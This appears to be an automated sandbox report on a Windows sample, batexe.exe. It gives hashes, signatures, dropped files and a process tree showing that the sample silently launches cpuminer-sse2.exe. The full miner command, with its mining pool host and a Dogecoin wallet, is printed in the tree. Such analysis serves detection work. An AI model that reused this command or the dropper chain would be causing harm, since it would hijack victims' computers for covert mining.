73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
306s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
23-02-2024 22:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4380	b2e.exe
2192	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2192	cpuminer-sse2.exe
2192	cpuminer-sse2.exe
2192	cpuminer-sse2.exe
2192	cpuminer-sse2.exe
2192	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2788-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2788 wrote to memory of 4380	2788	batexe.exe	75
PID 2788 wrote to memory of 4380	2788	batexe.exe	75
PID 2788 wrote to memory of 4380	2788	batexe.exe	75
PID 4380 wrote to memory of 1844	4380	b2e.exe	76
PID 4380 wrote to memory of 1844	4380	b2e.exe	76
PID 4380 wrote to memory of 1844	4380	b2e.exe	76
PID 1844 wrote to memory of 2192	1844	cmd.exe	79
PID 1844 wrote to memory of 2192	1844	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2788
- C:\Users\Admin\AppData\Local\Temp\B268.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\B268.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\B268.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B6DC.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1844
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2192

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\B268.tmp\b2e.exe

Filesize
960KB

MD5
d15ecf39e70d4d6e278b0da9ff36ba87

SHA1
2139694bf96cc3b6fbfadb8a9c8745b8901bff6a

SHA256
04b2e6191d36dccb7b93c7d207ff16c0702cdec9b64b98206f9ffc7dc7633d54

SHA512
326cdd9b35aa3dbd39d2fd4a22dd78f732d481f05ef6dca085cd086d8ca91502f3be961b44e5c4bbf2ebf947ffc4f1b4d4703593951fce22acaa418a77741434

Download Submit
C:\Users\Admin\AppData\Local\Temp\B268.tmp\b2e.exe

Filesize
1.4MB

MD5
5a994076b752215552c631397975c84c

SHA1
dbf7e7691d13b2adaf1643aafa623a246b440c19

SHA256
e71e4acff56f38c49a564d25db663fbb42c41dd8cb235d38415858d4ae827cdf

SHA512
707bc2f069b1e88fbfd68675b5c1232356b52fffc5d904f3630c8da91b63ea4970a4a561cf1b420ad9be9d0d25a1ee8a03045a6092241f1e8a3e3856ea747972

Download Submit
C:\Users\Admin\AppData\Local\Temp\B6DC.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
754KB

MD5
dcff4e419502ad28248d42ce097cd2f7

SHA1
c560d65d7837e23ec8ca69495c99a36f3ce3e1e7

SHA256
72a91fd50d7d82fb0605ec662257c13430026665e2d8f064a7e763cafad85bd9

SHA512
8a2ced8490ec917cd1f44f69e089c8a4b04147d784f68dcc0fc0cca4973abba6194806483fc1dc10108728e8b5b443d22726801a9ab609549d6989307f2d58ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
776KB

MD5
c520580bcc46bd358a6f21a4240d6fcd

SHA1
5723162866ff05def0c8b4d17c69ee5964a5576d

SHA256
3ab6b97b47ee302e71960f9480a58df05db51cf0f1640ec1ec22505a7ae45966

SHA512
fa5fad75f663c4bf4e0280db40271746a1a8b75453f8744d53ac1767c614d3c2822c818d78f79994293b7f344a70508eb38bfce8cdc6c11b333c67339ad3b978

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
774KB

MD5
54ed50b08a3c7a361882872e4df474ec

SHA1
c17131e54571c7f1e6c943a3d9bfa60b2cdd0d40

SHA256
f958c2c00c25d03a5d9d54d9d7425abcf00429545a75bf05c25d4bf20694ede3

SHA512
5d1b7e473680a0ff04fa6d96f56c11fe3b478b84197df6b47afce78dafbdecfe2fa9ff804e7fd1281ec417cce2591c1685fc510cf0e5b619a3f16be1814f5a3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
706KB

MD5
a06f5fdf1830e6c2aadb4aaec1cc3d61

SHA1
11f7d428c86340c9246728ea7f75b13b68f229e9

SHA256
a83b3b7a916f720111fa18aae3289206bfc6309de2e5444f2283031e61fb7448

SHA512
29b7369c630f189b4c3d8b86cc33e3734d9393775491158d82a9d71585a8d31c4b70102f273d04923379a4fe497e9a1690c2655f930a841a12edcad5a3c07bbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
924KB

MD5
801b1822f8884741ccc85568eb4b532d

SHA1
cdccd1b4e1987114d044270b4fafae82a061605d

SHA256
e2d2728b998fdcdf7f9c2619842594995fb799766d49dc87e801ce89e3daa84a

SHA512
1cb9774dea22bb58f516bd12fbffa566b79e719bc430cc699db5c06d8c920a696445004029919ef93111b2f8d8f08d46eee559da5e4159cdeb1cfbea80d88a7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
750KB

MD5
ab541fce32c754f4761b06a8a9ebb446

SHA1
753ac6d9b272e4faf1a9bbe1cfe642a42f0c62ed

SHA256
3f5d78712ad89ed76ffb8149aa7cc96c83f13135ca6406b4cc4f2a022baad666

SHA512
c5a339c42c033cdd3905b1dbc2a059e3b48ab9cf0d1a05a0840227de6865af0f04c870fc74c749dc95adda987923c2d4114c25ed62621dec0fd172f39d8a5399

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
573KB

MD5
31787cd294f54e74193cb7dd9747edb3

SHA1
dc0241423acb9b9cb522014fdf23bbf6b121c8a5

SHA256
b99c6505f558d3c9fba7d983ce15f6b80841afe33c0edc876feafc6240c68544

SHA512
3a04b2ff91d533f052897d2e9ce8512859a437acbcad0c71926b4555ceec387408037adb1e671cfdc15e54542a11c289ffe4e1d7b7ebb4b006648de3d611de5e

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
664KB

MD5
0b0767022db8de658ba9495b2f3bc95b

SHA1
8724e340e7de7aaad087285cbdb1d8b3374c4c0f

SHA256
c2f1eab4bf84084d69696c86ae524a191ca5be192a3837bc552ac70c4390f514

SHA512
ba48dde1d315319bc72bdd1ff0f7a15c81606d7d2214d225c3c6a69746dbd1ac55e3735c28cece0c5473e7f4fe841bc50195415a3f2c60a1bf86b1542d37c0c6

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
533KB

MD5
8f3713ba3db6cb4878fa04b175f0d574

SHA1
149b1d4661a483575b7ea38f4bc71bb47572fa7f

SHA256
51c0b4abc384f3979d777bb15394cd4ef3f0fdfc874845eb3caaa34d49339ea7

SHA512
fcf4a9fa7586521a89f27d4d82e5262c10482933e730c82d877057545f2406de7aca5a2b06f7e1b998785800eddea3ea02faba073f5c52af9fd7bb7ede1b0eb8

Download Submit
memory/2192-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2192-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2192-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2192-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2192-42-0x0000000055DA0000-0x0000000055E38000-memory.dmp

Filesize
608KB

Download
memory/2192-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2192-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2192-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2192-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/2192-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2192-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2192-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2788-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4380-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4380-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download